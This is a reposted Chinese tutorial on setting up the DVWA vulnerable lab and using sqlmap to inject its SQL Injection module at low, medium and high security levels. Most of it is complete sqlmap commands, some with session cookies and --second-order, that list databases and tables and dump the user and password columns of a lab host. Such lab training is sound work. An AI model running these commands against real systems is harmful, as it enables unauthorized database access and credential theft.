sqlmap使用教程
1、客戶端向服務(wù)端請(qǐng)求的流程
2、SQL注入常見(jiàn)分類
?3、SQL注入常見(jiàn)過(guò)程
?4、SQL注入的作用
?5、常用SQL測(cè)試語(yǔ)句
?注釋字符:
DVWA靶場(chǎng)搭建及使用(詳細(xì)圖文)
一、下載DVWA
下載地址:DVWA/README.zh.md at master · digininja/DVWA · GitHub
這里我是從GitHub上下載的,小伙伴們自行選擇
二、安裝DVWA
在安裝前,需要做一個(gè)準(zhǔn)備工作,我們先去做一個(gè)PHP+Mysql的環(huán)境搭建。
1.下載、安裝、啟動(dòng)phpstudy,小皮面板(phpstudy) - 讓天下沒(méi)有難配的服務(wù)器環(huán)境!
(phpStudy是一個(gè)PHP調(diào)試環(huán)境的程序集成包。恰好我們可以用到"PHP+Mysql+Apache"。)
注意開(kāi)啟apache和mysql
2、將下載的DVWA解壓到phpstudy網(wǎng)站根目錄下。
例如:我這解壓后的路徑是“D:\phpStudy\WWW\DVWA-master\”(這里為了后面進(jìn)入目錄方便,我會(huì)將文件名改成DVWA)
3、將 config.inc.php.dist 復(fù)制一份或重命令為 config.inc.php;
例如:我的配置文件路徑是“D:\phpStudy\WWW\DVWA-master\config”。
注意:有的小伙伴操作系統(tǒng)可能會(huì)默認(rèn)不顯示文件后綴名,改為顯示后綴名之后再重命名文件類型 config.inc.php.dist→config.inc.php。這步必須做。
4、修改 config.inc.php 里代碼如下:
$_DVWA[ 'db_server' ] ? = '127.0.0.1'; #數(shù)據(jù)庫(kù)地址
$_DVWA[ 'db_database' ] = 'dvwa'; #數(shù)據(jù)庫(kù)名稱
$_DVWA[ 'db_user' ] ? ? = 'root'; #數(shù)據(jù)庫(kù)用戶名
$_DVWA[ 'db_password' ] = 'root'; #數(shù)據(jù)庫(kù)密碼
因?yàn)閜hpstudy默認(rèn)的mysql數(shù)據(jù)庫(kù)地址是“127.0.0.1 或 localhost",用戶名和密碼都是"root"。主要是修改’db_password‘為root,這里很重要,修改后自然是需要保存文件的。
三、DVWA使用
1、設(shè)置或重置數(shù)據(jù)庫(kù)
瀏覽器只需要直接打開(kāi)“http://搭建環(huán)境的系統(tǒng)ip/DVWA-master/setup.php”即可!如果有”標(biāo)紅“提示,可能你要打開(kāi)一些模塊或做一些設(shè)置,否則有些是不能實(shí)驗(yàn)的,例如:文件包含、文件上傳漏洞。
????????????????如:紅色字體顯示“DVWA-PHP function allow_url_include: Disabled”錯(cuò)誤
????????????????需要改的不是DVWA文件夾下的php.ini,而是你安裝的php的php.ini。
????????????????由于我使用的是PHPstudy,找到所使用的php版本號(hào)所在文件夾,修改php.ini中的allow_url_include為On,錯(cuò)誤得到解決。
拉到下面,點(diǎn)擊Setup/Reset DB,點(diǎn)擊Create/Reset Database。會(huì)看到創(chuàng)建成功提示!
2、登陸
瀏覽器打開(kāi)”http://127.0.0.1/DVWA-master/login.php“登陸。默認(rèn)用戶名:admin,默認(rèn)密碼:password;
注意:若在kali中不能訪問(wèn)頁(yè)面,需要設(shè)置或關(guān)閉Windows服務(wù)器中防火墻。
3、設(shè)置程序安全級(jí)別
瀏覽器打開(kāi)”http://你自己ip/DVWA-master/security.php“來(lái)做設(shè)置,分別有”低、中、高、不可能“,程序安全級(jí)別越低,說(shuō)明越容易被攻破,沒(méi)有做任何的安全防護(hù)。主要是用來(lái)自我挑戰(zhàn)不同等級(jí)的程序防護(hù)級(jí)別的!
?環(huán)境配置好,可以開(kāi)打啦!
他山之石
sqlmap使用教程https://blog.csdn.net/Gherbirthday0916/article/details/126857683
DVWA靶場(chǎng)通關(guān)教程https://blog.csdn.net/CYwxh0125/article/details/122460851?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1-122460851-blog-127086871.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1-122460851-blog-127086871.pc_relevant_landingrelevant&utm_relevant_index=1
SQLMAP注入DVWA實(shí)戰(zhàn)https://blog.csdn.net/m0_62636343/article/details/124733514
?sqlmap問(wèn)題及解決辦法
利用sqlmap對(duì)DVWA中Low進(jìn)行SQL注入
輸入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1
?報(bào)錯(cuò):不可注入…提示
用一個(gè)帶上一個(gè)響應(yīng)包注入成功了
?切記: sqlmap.py -u 后面是跟URL
sqlmap.py -r 后面是跟響應(yīng)數(shù)據(jù)
sqlmap進(jìn)行注入時(shí),最好使用-r
最后再?gòu)?fù)習(xí)一下sqlmap注入命令:
1、是否存在注入點(diǎn)
python sqlmap.py -r “響應(yīng)包路徑”
2、獲取注入點(diǎn)所有數(shù)據(jù)庫(kù)
python sqlmap.py -r “響應(yīng)包路徑” --dbs
3、獲取當(dāng)前使用的數(shù)據(jù)庫(kù)
python sqlmap.py -r “響應(yīng)包路徑” --current-db --batch
4、獲取數(shù)據(jù)庫(kù)中的表
python sqlmap.py -r “響應(yīng)包路徑” --table -D “數(shù)據(jù)庫(kù)名” --batch
5、獲取表中的字段信息
python sqlmap.py -r “響應(yīng)包路徑” --columns -T “表名” -D “獲取的數(shù)據(jù)庫(kù)名” --batch
6、獲取字段具體信息
python sqlmap.py -r “響應(yīng)包路徑” --dump -C “字段名(可多個(gè))” --columns -T “表名” -D “數(shù)據(jù)庫(kù)名” --batch
7、當(dāng)前使用的賬戶
python sqlmap.py -r “響應(yīng)包路徑” --current-user
8、列出所有使用過(guò)的賬戶
python sqlmap.py -r “響應(yīng)包路徑” –users
9、mysql的登錄賬戶和密碼
python sqlmap.py -r “響應(yīng)包路徑” –passwords
例1:sqlmap.py -r 后面是跟響應(yīng)數(shù)據(jù)
第一步:復(fù)制durp工具捕獲的請(qǐng)求代碼,生成aa.txt文件。
第二步:sqlmap 注入
sqlmap -r "/home/hfy/桌面/aa.txt" -D dvwa -T users -C user,password --dump
獲得數(shù)據(jù)庫(kù)
獲得dvwa庫(kù)中表
獲得users表中列(字段)
獲得user,password字段值。
例2:sqlmap.py -u 后面是跟URL
第一步:durp工具捕獲的請(qǐng)求COOKies
瀏覽器登錄dvwa靶場(chǎng)——設(shè)置安全級(jí)為L(zhǎng)OW——選擇SQL Injection——輸入任意ID號(hào)——點(diǎn)擊Submit(瀏覽器要啟用代理:127.0.0.1,端口8080)
durp中在Proxy下開(kāi)啟Intercept is on
第二步:sqlmap注入
使用-u參數(shù)來(lái)指定目標(biāo)URL,--dbs進(jìn)行數(shù)據(jù)庫(kù)爆破
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --dbs
之后可得到數(shù)據(jù)庫(kù)信息:
爆破成功,接下來(lái)可進(jìn)行數(shù)據(jù)庫(kù)查看等一系列操作。
-D dvwa -tables: 查看數(shù)據(jù)庫(kù)dvwa中的表
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -tables
-T users -columns:查看表user中的字段名
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -T users -columns
-C user,password --dump:獲取字段user,password信息
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -T users -C user,password --dump
.DVWA等級(jí)--mid爆破方法:
同例1:sqlmap.py -r 后面是跟響應(yīng)數(shù)據(jù)
DVWA等級(jí)--high爆破方法:
需要二階sql注入(--second-order)
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" --dbs
?可以查看數(shù)據(jù)庫(kù)信息了。
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -tables
得到了數(shù)據(jù)中表信息。
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -T users -columns
得到了表中字段信息。
sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -T users -C user,password -dump文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-819025.html
得到了user,password字段的值。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-819025.html
到了這里,關(guān)于SQL注入(DVWA靶場(chǎng)搭建及使用、sqlMap注入、sqlmap問(wèn)題及解決辦法)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!